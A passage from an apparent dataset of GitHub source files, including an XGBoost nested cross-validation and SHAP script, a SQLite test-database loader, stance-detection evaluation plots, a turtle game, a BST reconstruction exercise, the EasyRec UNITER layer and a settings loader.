MinMaxScaler()],\n ['classifier', XGBClassifier(verbose=0)]\n ])\n\n \n params = {\n 'classifier__max_depth':[4, 6, 8, 10],\n 'classifier__learning_rate': [.01,.1,.2,.3],\n 'classifier__subsample': [.7, .8, .9,1],\n 'classifier__gamma':[0,.1,.3,.5,1],\n 'classifier__colsample_bytree': [.6, .8, 1.0]\n }\n \n \n # Search to optimize hyperparameters\n search = RandomizedSearchCV(pipeline, params, cv=cv_inner) \n search.fit(X_train, y_train)\n\n # evaluate the model\n yhat = search.predict(X_test)\n ypred = search.predict_proba(X_test)\n result = roc_auc_score(y_test, yhat)\n acc = accuracy_score(y_test, yhat)\n print(\"{:.2f}\".format(result)) \n \n\n ## Use SHAP to explain predictions\n ### prepare preprocessed X_test \n cloned_preproc_pipe = Pipeline([search.best_estimator_.steps[0], search.best_estimator_.steps[3]])\n X_test_transformed= pd.DataFrame(data= cloned_preproc_pipe.transform(X_test), columns=X.columns)\n \n \n explainer = shap.TreeExplainer(search.best_estimator_.steps[-1][1])\n shap_values = explainer.shap_values(X_test_transformed)\n\n # Extract SHAP information per fold per sample \n for i, test_index in enumerate(test_outer_ix):\n shap_values_per_cv[test_index][CV_repeat] = shap_values[i] \n\n\n # Append\n results.append({'count':count,'yhat': \n yhat,'ypred':ypred,\n 'ytest':y_test,\n 'score_acc':[acc]})\n \n y_pred = pd.DataFrame(ypred.argmax(axis=1))\n\n conf_matrix = classification_report(list(y_test),list(ypred.argmax(axis=1)),target_names=labels,output_dict=True)\n # save classification_report for obtaining precision,recall,f1 and accuracy for later \n conf_matrix_list_of_arrays.append({'count':count,\n 'macro-avg':conf_matrix['macro avg'],\n labels[0]:conf_matrix[labels[0]],\n labels[1]:conf_matrix[labels[1]],\n 'weighted_avg':conf_matrix['weighted avg'],\n 'accuracy':conf_matrix['accuracy']})\n\n # store acc\n outer_results.append(acc)\n # report progress\n fpr, tpr, _ = roc_curve(y_test, ypred[:, 1])\n roc_auc = roc_auc_score(y_test, ypred[:, 1])\n\n interp_tpr = np.interp(mean_fpr, fpr, tpr)\n interp_tpr[0] = 0.0\n tprs.append(interp_tpr)\n aucs.append(roc_auc)\n count = count+1\n \n ## print log\n print(\"randomized gs params:{}\".format(search.best_estimator_[-1].get_params()))\n print(\"CV repeat: {:.0f}, fold: {:.0f}, train:{:.3f}, test: {:.3f}\".format(CV_repeat, i, search.score(X_train,y_train),result))\n\n\n ax.plot([0, 1], [0, 1], linestyle=\"--\", lw=2, color=\"r\", label=\"Chance\", alpha=0.8)\n\n mean_tpr = np.mean(tprs, axis=0)\n mean_tpr[-1] = 1.0\n mean_auc = auc(mean_fpr, mean_tpr)\n std_auc = np.std(aucs)\n ax.plot(\n mean_fpr,\n mean_tpr,\n color=\"b\",\n label=r\"Mean ROC (AUC = %0.2f $\\pm$ %0.2f)\" % (mean_auc, std_auc),\n lw=2,\n alpha=0.8,\n )\n\n std_tpr = np.std(tprs, axis=0)\n tprs_upper = np.minimum(mean_tpr + std_tpr, 1)\n tprs_lower = np.maximum(mean_tpr - std_tpr, 0)\n\n tn = \"ROC classification {} vs {} \\n domain {}\".format(labels[0],labels[1],key)\n\n\n ax.fill_between(\n mean_fpr,\n tprs_lower,\n tprs_upper,\n color=\"lightcoral\",\n alpha=0.2,\n label=r\"$\\pm$ 1 std. dev.\",\n )\n\n ax.set(\n xlim=[-0.05, 1.05],\n ylim=[-0.05, 1.05],\n title=tn,\n )\n ax.legend(loc=\"lower right\")\n\n\n os.chdir(directory)\n plt.tight_layout()\n plt.savefig(\"ROC.png\",dpi=600)\n #plt.show()\n plt.close()\n\n resultsdf = pd.DataFrame(results)\n\n\n \n \n \n # Establish lists to keep average Shap values, their Stds, and their min and max\n average_shap_values, stds, ranges = [],[],[]\n\n for i in range(0,len(X)):\n df_per_obs = pd.DataFrame.from_dict(shap_values_per_cv[i]) # Get all SHAP values for sample number i (n(X) x N_REPEATS)\n # Get relevant statistics for every sample \n average_shap_values.append(df_per_obs.mean(axis=1).values) \n stds.append(df_per_obs.std(axis=1).values)\n ranges.append(df_per_obs.max(axis=1).values-df_per_obs.min(axis=1).values) \n \n \n shap_vals = np.array(average_shap_values)\n avg_shap_values = pd.DataFrame(shap_vals, columns=X.columns)\n fn = \"avg_shap_values_{}.csv\".format(key)\n avg_shap_values.to_csv(fn,encoding=\"utf-8\", sep=\"\\t\")\n\n stds_vals = np.array(stds)\n stds_df = pd.DataFrame(stds_vals, columns=X.columns)\n fn = \"stds_shap_values_{}.csv\".format(key)\n stds_df.to_csv(fn,encoding=\"utf-8\", sep=\"\\t\")\n\n\n ranges_vals = np.array(ranges)\n ranges_df = pd.DataFrame(ranges_vals, columns=X.columns)\n fn = \"ranges_shap_values_{}.csv\".format(key)\n ranges_df.to_csv(fn,encoding=\"utf-8\", sep=\"\\t\")\n \n\n \n end_time = datetime.now()\n print('Duration: {}'.format(end_time - start_time))\n \n \n # convert to dataframe\n resultsdf = pd.DataFrame(results)\n\n ypreds = list((np.concatenate(resultsdf[\"ypred\"])).argmax(axis=1))\n print(classification_report(list(np.concatenate(resultsdf[\"ytest\"])),ypreds,target_names=labels))\n\n report = classification_report(list(np.concatenate(resultsdf[\"ytest\"])),ypreds,target_names=labels, output_dict=True)\n df = pd.DataFrame(report).transpose()\n fn = \"results_{}.csv\".format(key)\n df.to_csv(fn, sep=\"\\t\", encoding=\"utf-8\")\n\n\n # save results\n resultsdf = pd.DataFrame(results)\n fn = \"results_{}.csv\".format(key)\n resultsdf.to_csv(fn,encoding=\"utf-8\",sep=\"\\t\")\n\n tprs_df = pd.DataFrame(data=tprs)\n tprs_df.to_csv(\"tprs.csv\", encoding=\"utf-8\",sep=\"\\t\")\n\n # save model \n import pickle\n import joblib\n bm= search.best_estimator_.steps[-1][1]\n pickle.dump(bm, open(\"xgb_model.pkl\", \"wb\"))\n\n filename = 'grid_searched_model.sav'\n\n model = search.best_estimator_.steps[-1][1]\n joblib.dump(model, filename)\n\n\n with open(\"conf_matrix_list_of_arrays.pkl\",\"wb\") as fp:\n pickle.dump(conf_matrix_list_of_arrays,fp)\n\n import pickle\n fn = \"avgshap_values_{}.pkl\".format(key)\n with open(fn,\"wb\") as fp:\n pickle.dump(shap_vals,fp)\n","repo_name":"higgteil/eeg-predict","sub_path":"machine_learning/repeated_ncv_classif_by_domain.py","file_name":"repeated_ncv_classif_by_domain.py","file_ext":"py","file_size_in_byte":14374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22700462358","text":"\"\"\"\nModule with methods to extract database dump, and create database from dump\nfile, and add views to database.\n\nThis is done so that a test database can easily be recreated to have a common\nstarting point for testing the package.\n\"\"\"\n\nimport os\nimport sqlite3 as sq3\nimport sys\n\nfrom text_unidecode import unidecode\n\n# set up paths for where to find original database\nBASE_PATH = os.path.split(os.path.abspath(__file__))[0]\nBASE_DATABASE_FILENAME = \"chinook.db\"\nBASE_DATABASE_PATH = os.path.join(BASE_PATH, BASE_DATABASE_FILENAME)\n\n# Or where to find dump file and create test database\nDUMP_PATH = os.path.join(BASE_PATH, f\"{BASE_DATABASE_FILENAME[:-3]}_dump.sql\")\nTEST_PATH = os.path.join(BASE_PATH, f\"test_{BASE_DATABASE_FILENAME}\")\nVIEW_DIR = os.path.join(BASE_PATH, \"views\")\n\n\ndef extract_dump(db_path, dump_path):\n \"\"\"\n Create dump of database given the path to the database file\n\n PARAMETERS\n db_path: str: path to database file\n dump_path: str: path to the dump file to be saved\n \"\"\"\n\n with sq3.connect(db_path) as conn:\n with open(dump_path, \"w\", newline=\"\") as f:\n # noinspection PyTypeChecker\n for line in conn.iterdump():\n f.write(unidecode(line))\n\n\ndef load_dump(db_path, dump_path):\n \"\"\"\n Create test database given path to dump file\n\n PARAMETERS\n db_path: str: path to database file to be created\n dump_path: str: path to the dump file to be used to create database\n \"\"\"\n\n # start by removing the existing database if one exists\n try:\n os.remove(db_path)\n except PermissionError:\n print(f\"could not delete {db_path}, continuing anyway\")\n except FileNotFoundError:\n # if the file was not found, nothing needs to be done.\n pass\n\n with open(dump_path, \"r\") as f:\n sql = f.read()\n\n with sq3.connect(db_path) as cursor:\n try:\n cursor.executescript(sql)\n except sq3.OperationalError:\n # most likely cause is the table already exists\n pass\n\n\ndef add_views(db_path, view_dir):\n \"\"\"\n add views to database\n\n PARAMETERS\n db_path: str: path to database to have views added\n view_dir: str: path the directory with view files. The contents of the\n files are not the sql to create the view, but rather the\n query the view should have. The view name uses the filename\n of the query\n \"\"\"\n\n conn = sq3.connect(db_path)\n cursor = conn.cursor()\n\n for file in os.listdir(view_dir):\n if not file.lower().endswith(\".sql\"):\n # skip all non .sql files\n continue\n path = os.path.join(view_dir, file)\n sql = f\"CREATE VIEW IF NOT EXISTS [{file[:-4]}] AS\\n\"\n with open(path, \"r\") as f:\n sql += f.read()\n try:\n cursor.execute(sql)\n conn.commit()\n except sq3.OperationalError:\n print(f\"failed to create view {file}\")\n continue\n\n cursor.close()\n conn.close()\n\n\nif __name__ == \"__main__\":\n args = sys.argv[1]\n if args == \"create-dump\":\n # to extract database and create dump file run...\n extract_dump(BASE_DATABASE_PATH, DUMP_PATH)\n elif args == \"load-dump\":\n # to load dump file and create test db run...\n load_dump(TEST_PATH, DUMP_PATH)\n add_views(TEST_PATH, VIEW_DIR)\n else:\n print(\"did not create anything\")\n","repo_name":"JJCoding01/dbReport","sub_path":"tests/data/db_setup.py","file_name":"db_setup.py","file_ext":"py","file_size_in_byte":3439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9939366048","text":"from feature_engineering import DataSet\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom StanceDetection.utils.score import report_score\nimport seaborn as sn\n\nfrom sklearn.metrics import precision_recall_fscore_support, accuracy_score\n\n# dataset = DataSet('competition_test', 'mlp', True)\n# df = dataset.load_data('competition_test')\n\n#print(df['Headline'].nunique(), df['articleBody'].nunique(), df.shape, df.drop_duplicates().shape)\n\n# rs = df.groupby('Stance').count()\n# rs /= df.shape[0]\n# print(rs)\n\n# rs = df[df['Stance']!='unrelated']\n# x = rs.shape[0]\n# rs = rs.groupby('Stance').count()['Headline']\n# rs /= x\n# print(rs)\n\n\n\n# df = pd.read_pickle('/home/marjan/StanceDetection/data/train_lstm_bert_feats')\n# df['len_head'] = df['Headline_sentences'].apply(lambda x: x.shape[0])\n# df['len_art'] = df['article_sentences'].apply(lambda x: x.shape[0])\n\n# print(df['len_head'].quantile(q=0.5), df['len_head'].quantile(q=0.75), df['len_head'].quantile(q=0.95), df['len_head'].max())\n# print(df['len_art'].quantile(q=0.5), df['len_art'].quantile(q=0.75), df['len_art'].quantile(q=0.95), df['len_art'].max())\n\ndf = pd.read_csv('res.csv')\nprint(df[df['actual']==df['predicted']].shape[0]/df.shape[0])\nconf = report_score(df['actual'], df['predicted'], stage='final', labels=['agree', 'disagree', 'discuss', 'unrelated'])\np, r, f1, _ = precision_recall_fscore_support(df['actual'], df['predicted'], average=\"macro\")\nprint(f1)\n\nall_stances = df['actual'].values.tolist()\nfinal_pred_stance = df['predicted'].values.tolist()\n\nactual_agree = [1 if x=='agree' else 0 for x in all_stances]\npred_agree = [1 if x=='agree' else 0 for x in final_pred_stance]\n_, _, f1, _ = precision_recall_fscore_support(actual_agree, pred_agree, average=\"binary\")\nprint('agree', f1)\n\nactual_agree = [1 if x=='disagree' else 0 for x in all_stances]\npred_agree = [1 if x=='disagree' else 0 for x in final_pred_stance]\n_, _, f1, _ = precision_recall_fscore_support(actual_agree, pred_agree, average=\"binary\")\nprint('disagree', f1)\n\nactual_agree = [1 if x=='discuss' else 0 for x in all_stances]\npred_agree = [1 if x=='discuss' else 0 for x in final_pred_stance]\n_, _, f1, _ = precision_recall_fscore_support(actual_agree, pred_agree, average=\"binary\")\nprint('discuss', f1)\n\nactual_agree = [1 if x=='unrelated' else 0 for x in all_stances]\npred_agree = [1 if x=='unrelated' else 0 for x in final_pred_stance]\n_, _, f1, _ = precision_recall_fscore_support(actual_agree, pred_agree, average=\"binary\")\nprint('unrelated', f1)\n\nplt.clf()\nax = plt.subplot()\nsn.heatmap(conf, annot=True, fmt='g', cmap='BuGn',\n linewidths=4, square=True, ax=ax)\nax.set(xlabel='predicted', ylabel='actual')\nax.xaxis.set_ticklabels(['agree', 'disagree', 'discuss', 'unrelated'])\nax.yaxis.set_ticklabels(['agree', 'disagree', 'discuss', 'unrelated'])\nplt.savefig('baseline_conf.png')","repo_name":"MarjaaanSh/StanceDetection","sub_path":"visualizations.py","file_name":"visualizations.py","file_ext":"py","file_size_in_byte":2844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73840446915","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nREQUIRES = ['dbus-python>=1.2.8', 'PyGObject>=3.22.0', 'pyserial>=3.4', 'PyYAML>=3.13']\n\nsetuptools.setup(\n name=\"bumpemu\",\n version=\"0.0.8\",\n author=\"Frank Riley\",\n author_email=\"fhriley@gmail.com\",\n description=\"A bump controller emulator on Raspberry Pi Zero W.\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/fhriley/bumpemu\",\n license='GNU GPLv3',\n packages=setuptools.find_packages(),\n include_package_data=True,\n package_data={'bumpemu': ['config/presets.yml']},\n python_requires='>=3.5',\n install_requires=REQUIRES,\n classifiers=[\n \"Development Status :: 4 - Beta\",\n \"Environment :: Console\",\n \"License :: OSI Approved :: GNU General Public License v3 or later (GPLv3+)\",\n \"Operating System :: POSIX :: Linux\",\n \"Programming Language :: Python :: 3 :: Only\",\n ],\n entry_points={\n 'console_scripts': [\n 'bumpemu-controller = bumpemu.main:main',\n 'powerlab-tester = bumpemu.charger.tester:main'\n ]\n }\n)\n","repo_name":"fhriley/bumpemu","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"26745665466","text":"import time\nfrom turtle import Screen\nfrom player import Player, FINISH_LINE_Y\nfrom car_manager import CarManager\nfrom scoreboard import Scoreboard\n\nscreen = Screen()\nscreen.setup(width=600, height=600)\nscreen.tracer(0)\n\neze = Player()\ncar_manager = CarManager()\nscoreboard = Scoreboard()\n\nscreen.listen()\nscreen.onkey(eze.up, 'Up')\n\ngame_is_on = True\nwhile game_is_on:\n time.sleep(0.1)\n screen.update()\n\n car_manager.create_car()\n car_manager.move_cars()\n\n for car in car_manager.all_cars:\n if car.distance(eze) < 20:\n game_is_on = not game_is_on\n scoreboard.game_over()\n\n if eze.ycor() > FINISH_LINE_Y:\n eze.reset_turtle()\n car_manager.increment_car_speed()\n scoreboard.increase_score()\n\nscreen.exitonclick()\n","repo_name":"exerazor1911/turtle-crossing","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23407348698","text":"# Reconstruct a BST from traversal data\n\n## SOLUTION: Preorder traversal gives unique BST representation.\n# First node = root\n# Second node = left subtree\n# Final subsequence with keys > first node = right subtree\n\nfrom TreeNode import Node\n\ndef inorder_traversal(root):\n\tif not root:\n\t\treturn None\n\n\tif root.left:\n\t\tinorder_traversal(root.left)\n\n\tinorder.append(root.val)\n\n\tif root.right:\n\t\tinorder_traversal(root.right)\n\n\ndef reconstruct_bst(preorder):\n\tif not preorder:\n\t\treturn None\n\n\ttransition_point = next((i for i,a in enumerate(preorder) if a > preorder[0]), len(preorder))\n\n\t# for idx in range(1, len(preorder)):\n\t# \tif preorder[idx] > preorder[0]:\n\t# \t\ttransition_point = idx\n\t# \t\tbreak\n\n\troot = Node(preorder[0])\n\troot.left = reconstruct_bst(preorder[1:transition_point])\n\troot.right = reconstruct_bst(preorder[transition_point:])\n\n\treturn root\n\npreorder = [43, 23, 37, 29, 31, 41, 47, 53]\n\ntree = reconstruct_bst(preorder)\n\ninorder = []\n\ninorder_traversal(tree)\n\nprint(\"Inorder traversal of the tree: {}\".format(inorder))\n","repo_name":"sheelabhadra/Elements-Programming-Interviews","sub_path":"Binary Search Trees/reconstruct_bst.py","file_name":"reconstruct_bst.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"34626356779","text":"import tensorflow as tf\n\nfrom easy_rec.python.layers import dnn\nfrom easy_rec.python.layers import multihead_cross_attention\nfrom easy_rec.python.utils.activation import get_activation\nfrom easy_rec.python.utils.shape_utils import get_shape_list\n\nif tf.__version__ >= '2.0':\n tf = tf.compat.v1\n\n\nclass Uniter(object):\n \"\"\"UNITER: UNiversal Image-TExt Representation Learning.\n\n See the original paper:\n https://arxiv.org/abs/1909.11740\n \"\"\"\n\n def __init__(self, model_config, feature_configs, features, uniter_config,\n input_layer):\n self._model_config = uniter_config\n tower_num = 0\n self._img_features = None\n if input_layer.has_group('image'):\n self._img_features, _ = input_layer(features, 'image')\n tower_num += 1\n self._general_features = None\n if input_layer.has_group('general'):\n self._general_features, _ = input_layer(features, 'general')\n tower_num += 1\n self._txt_seq_features = None\n if input_layer.has_group('text'):\n self._txt_seq_features, _, _ = input_layer(\n features, 'text', is_combine=False)\n tower_num += 1\n self._use_token_type = True if tower_num > 1 else False\n self._other_features = None\n if input_layer.has_group('other'): # e.g. statistical feature\n self._other_features, _ = input_layer(features, 'other')\n tower_num += 1\n assert tower_num > 0, 'there must be one of the feature groups: [image, text, general, other]'\n\n self._general_feature_num = 0\n self._txt_feature_num, self._img_feature_num = 0, 0\n general_feature_names = set()\n img_feature_names, txt_feature_names = set(), set()\n for fea_group in model_config.feature_groups:\n if fea_group.group_name == 'general':\n self._general_feature_num = len(fea_group.feature_names)\n general_feature_names = set(fea_group.feature_names)\n assert self._general_feature_num == len(general_feature_names), (\n 'there are duplicate features in `general` feature group')\n elif fea_group.group_name == 'image':\n self._img_feature_num = len(fea_group.feature_names)\n img_feature_names = set(fea_group.feature_names)\n assert self._img_feature_num == len(img_feature_names), (\n 'there are duplicate features in `image` feature group')\n elif fea_group.group_name == 'text':\n self._txt_feature_num = len(fea_group.feature_names)\n txt_feature_names = set(fea_group.feature_names)\n assert self._txt_feature_num == len(txt_feature_names), (\n 'there are duplicate features in `text` feature group')\n\n if self._txt_feature_num > 1 or self._img_feature_num > 1:\n self._use_token_type = True\n self._token_type_vocab_size = self._txt_feature_num\n if self._img_feature_num > 0:\n self._token_type_vocab_size += 1\n if self._general_feature_num > 0:\n self._token_type_vocab_size += 1\n\n max_seq_len = 0\n txt_fea_emb_dim_list = []\n general_emb_dim_list = []\n img_fea_emb_dim_list = []\n for feature_config in feature_configs:\n fea_name = feature_config.input_names[0]\n if feature_config.HasField('feature_name'):\n fea_name = feature_config.feature_name\n if fea_name in img_feature_names:\n img_fea_emb_dim_list.append(feature_config.raw_input_dim)\n if fea_name in general_feature_names:\n general_emb_dim_list.append(feature_config.embedding_dim)\n if fea_name in txt_feature_names:\n txt_fea_emb_dim_list.append(feature_config.embedding_dim)\n if feature_config.HasField('max_seq_len'):\n assert feature_config.max_seq_len > 0, (\n 'feature config `max_seq_len` must be greater than 0 for feature: '\n + fea_name)\n if feature_config.max_seq_len > max_seq_len:\n max_seq_len = feature_config.max_seq_len\n\n unique_dim_num = len(set(txt_fea_emb_dim_list))\n assert unique_dim_num <= 1 and len(\n txt_fea_emb_dim_list\n ) == self._txt_feature_num, (\n 'Uniter requires that all `text` feature dimensions must be consistent.'\n )\n unique_dim_num = len(set(img_fea_emb_dim_list))\n assert unique_dim_num <= 1 and len(\n img_fea_emb_dim_list\n ) == self._img_feature_num, (\n 'Uniter requires that all `image` feature dimensions must be consistent.'\n )\n unique_dim_num = len(set(general_emb_dim_list))\n assert unique_dim_num <= 1 and len(\n general_emb_dim_list\n ) == self._general_feature_num, (\n 'Uniter requires that all `general` feature dimensions must be consistent.'\n )\n\n if self._txt_feature_num > 0 and uniter_config.use_position_embeddings:\n assert uniter_config.max_position_embeddings > 0, (\n 'model config `max_position_embeddings` must be greater than 0. ')\n assert uniter_config.max_position_embeddings >= max_seq_len, (\n 'model config `max_position_embeddings` must be greater than or equal to the maximum of all feature config '\n '`max_seq_len`, which is %d' % max_seq_len)\n\n self._img_emb_size = img_fea_emb_dim_list[0] if img_fea_emb_dim_list else 0\n self._txt_emb_size = txt_fea_emb_dim_list[0] if txt_fea_emb_dim_list else 0\n self._general_emb_size = general_emb_dim_list[\n 0] if general_emb_dim_list else 0\n if self._img_features is not None:\n assert self._img_emb_size > 0, '`image` feature dimensions must be greater than 0, set by `raw_input_dim`'\n\n def text_embeddings(self, token_type_id):\n all_txt_features = []\n input_masks = []\n hidden_size = self._model_config.hidden_size\n if self._general_features is not None:\n general_features = self._general_features\n if self._general_emb_size != hidden_size:\n # Run a linear projection of `hidden_size`\n general_features = tf.reshape(\n general_features, shape=[-1, self._general_emb_size])\n general_features = tf.layers.dense(\n general_features, hidden_size, name='txt_projection')\n general_features = tf.reshape(\n general_features, shape=[-1, self._general_feature_num, hidden_size])\n\n batch_size = tf.shape(general_features)[0]\n general_features = multihead_cross_attention.embedding_postprocessor(\n general_features,\n use_token_type=self._use_token_type,\n token_type_ids=tf.ones(\n shape=tf.stack([batch_size, self._general_feature_num]),\n dtype=tf.int32) * token_type_id,\n token_type_vocab_size=self._token_type_vocab_size,\n reuse_token_type=tf.AUTO_REUSE,\n use_position_embeddings=False,\n dropout_prob=self._model_config.hidden_dropout_prob)\n\n all_txt_features.append(general_features)\n mask = tf.ones(\n shape=tf.stack([batch_size, self._general_feature_num]),\n dtype=tf.int32)\n input_masks.append(mask)\n\n if self._txt_seq_features is not None:\n\n def dynamic_mask(x, max_len):\n ones = tf.ones(shape=tf.stack([x]), dtype=tf.int32)\n zeros = tf.zeros(shape=tf.stack([max_len - x]), dtype=tf.int32)\n return tf.concat([ones, zeros], axis=0)\n\n token_type_id += len(all_txt_features)\n for i, (seq_fea, seq_len) in enumerate(self._txt_seq_features):\n batch_size, max_seq_len, emb_size = get_shape_list(seq_fea, 3)\n if emb_size != hidden_size:\n seq_fea = tf.reshape(seq_fea, shape=[-1, emb_size])\n seq_fea = tf.layers.dense(\n seq_fea, hidden_size, name='txt_seq_projection_%d' % i)\n seq_fea = tf.reshape(seq_fea, shape=[-1, max_seq_len, hidden_size])\n\n seq_fea = multihead_cross_attention.embedding_postprocessor(\n seq_fea,\n use_token_type=self._use_token_type,\n token_type_ids=tf.ones(\n shape=tf.stack([batch_size, max_seq_len]), dtype=tf.int32) *\n (i + token_type_id),\n token_type_vocab_size=self._token_type_vocab_size,\n reuse_token_type=tf.AUTO_REUSE,\n use_position_embeddings=self._model_config.use_position_embeddings,\n max_position_embeddings=self._model_config.max_position_embeddings,\n position_embedding_name='txt_position_embeddings_%d' % i,\n dropout_prob=self._model_config.hidden_dropout_prob)\n all_txt_features.append(seq_fea)\n\n input_mask = tf.map_fn(\n fn=lambda t: dynamic_mask(t, max_seq_len),\n elems=tf.to_int32(seq_len))\n input_masks.append(input_mask)\n\n return all_txt_features, input_masks\n\n def image_embeddings(self):\n if self._img_features is None:\n return None\n hidden_size = self._model_config.hidden_size\n image_features = self._img_features\n if self._img_emb_size != hidden_size:\n # Run a linear projection of `hidden_size`\n image_features = tf.reshape(\n image_features, shape=[-1, self._img_emb_size])\n image_features = tf.layers.dense(\n image_features, hidden_size, name='img_projection')\n image_features = tf.reshape(\n image_features, shape=[-1, self._img_feature_num, hidden_size])\n\n batch_size = tf.shape(image_features)[0]\n img_fea = multihead_cross_attention.embedding_postprocessor(\n image_features,\n use_token_type=self._use_token_type,\n token_type_ids=tf.zeros(\n shape=tf.stack([batch_size, self._img_feature_num]),\n dtype=tf.int32),\n token_type_vocab_size=self._token_type_vocab_size,\n reuse_token_type=tf.AUTO_REUSE,\n use_position_embeddings=self._model_config.use_position_embeddings,\n max_position_embeddings=self._model_config.max_position_embeddings,\n position_embedding_name='img_position_embeddings',\n dropout_prob=self._model_config.hidden_dropout_prob)\n return img_fea\n\n def __call__(self, is_training, *args, **kwargs):\n if not is_training:\n self._model_config.hidden_dropout_prob = 0.0\n self._model_config.attention_probs_dropout_prob = 0.0\n\n sub_modules = []\n\n img_fea = self.image_embeddings()\n start_token_id = 1 if self._img_feature_num > 0 else 0\n txt_features, txt_masks = self.text_embeddings(start_token_id)\n\n if img_fea is not None:\n batch_size = tf.shape(img_fea)[0]\n elif txt_features:\n batch_size = tf.shape(txt_features[0])[0]\n else:\n batch_size = None\n\n hidden_size = self._model_config.hidden_size\n if batch_size is not None:\n all_features = []\n masks = []\n cls_emb = tf.get_variable(name='cls_emb', shape=[1, 1, hidden_size])\n cls_emb = tf.tile(cls_emb, [batch_size, 1, 1])\n all_features.append(cls_emb)\n\n mask = tf.ones(shape=tf.stack([batch_size, 1]), dtype=tf.int32)\n masks.append(mask)\n\n if img_fea is not None:\n all_features.append(img_fea)\n mask = tf.ones(\n shape=tf.stack([batch_size, self._img_feature_num]), dtype=tf.int32)\n masks.append(mask)\n\n if txt_features:\n all_features.extend(txt_features)\n masks.extend(txt_masks)\n\n all_fea = tf.concat(all_features, axis=1)\n input_mask = tf.concat(masks, axis=1)\n attention_mask = multihead_cross_attention.create_attention_mask_from_input_mask(\n from_tensor=all_fea, to_mask=input_mask)\n hidden_act = get_activation(self._model_config.hidden_act)\n attention_fea = multihead_cross_attention.transformer_encoder(\n all_fea,\n hidden_size=hidden_size,\n num_hidden_layers=self._model_config.num_hidden_layers,\n num_attention_heads=self._model_config.num_attention_heads,\n attention_mask=attention_mask,\n intermediate_size=self._model_config.intermediate_size,\n intermediate_act_fn=hidden_act,\n hidden_dropout_prob=self._model_config.hidden_dropout_prob,\n attention_probs_dropout_prob=self._model_config\n .attention_probs_dropout_prob,\n initializer_range=self._model_config.initializer_range,\n name='uniter') # shape: [batch_size, seq_length, hidden_size]\n print('attention_fea:', attention_fea.shape)\n mm_fea = attention_fea[:, 0, :] # [CLS] feature\n sub_modules.append(mm_fea)\n\n if self._other_features is not None:\n if self._model_config.HasField('other_feature_dnn'):\n l2_reg = kwargs['l2_reg'] if 'l2_reg' in kwargs else 0\n other_dnn_layer = dnn.DNN(self._model_config.other_feature_dnn, l2_reg,\n 'other_dnn', is_training)\n other_fea = other_dnn_layer(self._other_features)\n else:\n other_fea = self._other_features\n sub_modules.append(other_fea)\n\n if len(sub_modules) == 1:\n return sub_modules[0]\n output = tf.concat(sub_modules, axis=-1)\n return output\n","repo_name":"alibaba/EasyRec","sub_path":"easy_rec/python/layers/uniter.py","file_name":"uniter.py","file_ext":"py","file_size_in_byte":12731,"program_lang":"python","lang":"en","doc_type":"code","stars":1284,"dataset":"github-code","pt":"61"} +{"seq_id":"72643347395","text":"import yaml\nimport traceback\nimport os\n\nfrom pathlib import Path\n\n\nfrom utils.exc import InvalidSettingsWarning\nfrom utils.exc import InvalidSettingsError # noqa: 401 \n\n\"\"\"\nthis is to load the settings as global variables. There are three portions\nthe first defines the variable type\nthe second is the load function which loads the variables\nthe third is the freeze function which allows saving the variables\n\n\"\"\"\n\nlocation = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nresource_location = os.path.join(location, \"resources\")\n\ndebug_level: int\nrecognize_available_cores: bool\nn_processors: int\nid_file_rt_unit: str\ntrim_ids_to_mzml_bounds: bool\nchunk_size: int\nchunking_method_threshold: int\nmax_valid_angle: float\ntime_window: float\nppm_window: int\nlabel_key: str\naa_labeling_sites_path: str\npeak_lookback: int\npeak_lookahead: int\nbaseline_lookback: int\nmin_envelopes_to_combine: int\npeak_ratio_denominator: int\nzscore_cutoff: int\nmz_proximity_tolerance: int\nrt_proximity_tolerance: float\nmin_aa_sequence_length: int\nmin_allowed_n_values: int\nstarting_enrichment_table_timepoints: int\nerror_estimation: str\nmin_non_zero_timepoints_rate: int\nmin_allowed_timepoints_enrichment: int\nminimum_allowed_sequence_rate: float\nmaximum_allowed_sequence_rate: float\nminimum_sequences_to_combine_for_protein_rate: int\nlowest_allowed_norm_isotope: float\nhighest_allowed_norm_isotope: float\nm0_decreasing_allowed_noise: float\nmedian_absolute_residuals_cutoff_single_point: float\nmedian_absolute_residuals_cutoff_two_points: float\nmedian_absolute_residuals_cutoff_general: float\ndesired_points_for_optimization_graph: int\nintensity_filter: int\nrel_height: float\nprotein_combination_method: str\nsampling_rate: int\nsmoothing_width: int\nsmoothing_order: int\nallowed_peak_variance_min: float\nallowed_neutromer_peak_variance: float\nadduct_weight: float\nvariance_weight: float\nID_weight: float\nintensity_weight: float\nhow_divided: str\nuse_chromatography_division: str\ngraph_output_format: str\nms_level: int\nmax_enrichment_allowed: float\nverbose_output: bool\n\n# TODO: add quick explanation of how this works, inc. 'global' doc link\ndef load(settings_path):\n # NOTE: Look at the python documentation for the 'global' statement if youf\n # Want to understand how this module works\n try:\n settings_path = Path(settings_path)\n with settings_path.open('r') as f:\n s = yaml.load(f, Loader=yaml.FullLoader)\n global debug_level\n debug_level = s['debug_level']\n if debug_level not in [0, 1, 2]:\n raise InvalidSettingsWarning(\n 'Invalid debug level value given'\n )\n print('Running with debug level 0')\n debug_level = 0\n\n global recognize_available_cores\n recognize_available_cores = s['recognize_available_cores']\n\n global n_processors\n n_processors = s['n_processors']\n\n global id_file_rt_unit\n id_file_rt_unit = s['id_file_rt_unit']\n\n global trim_ids_to_mzml_bounds\n trim_ids_to_mzml_bounds = s['trim_ids_to_mzml_bounds']\n\n global chunk_size\n chunk_size = s['chunk_size']\n\n global 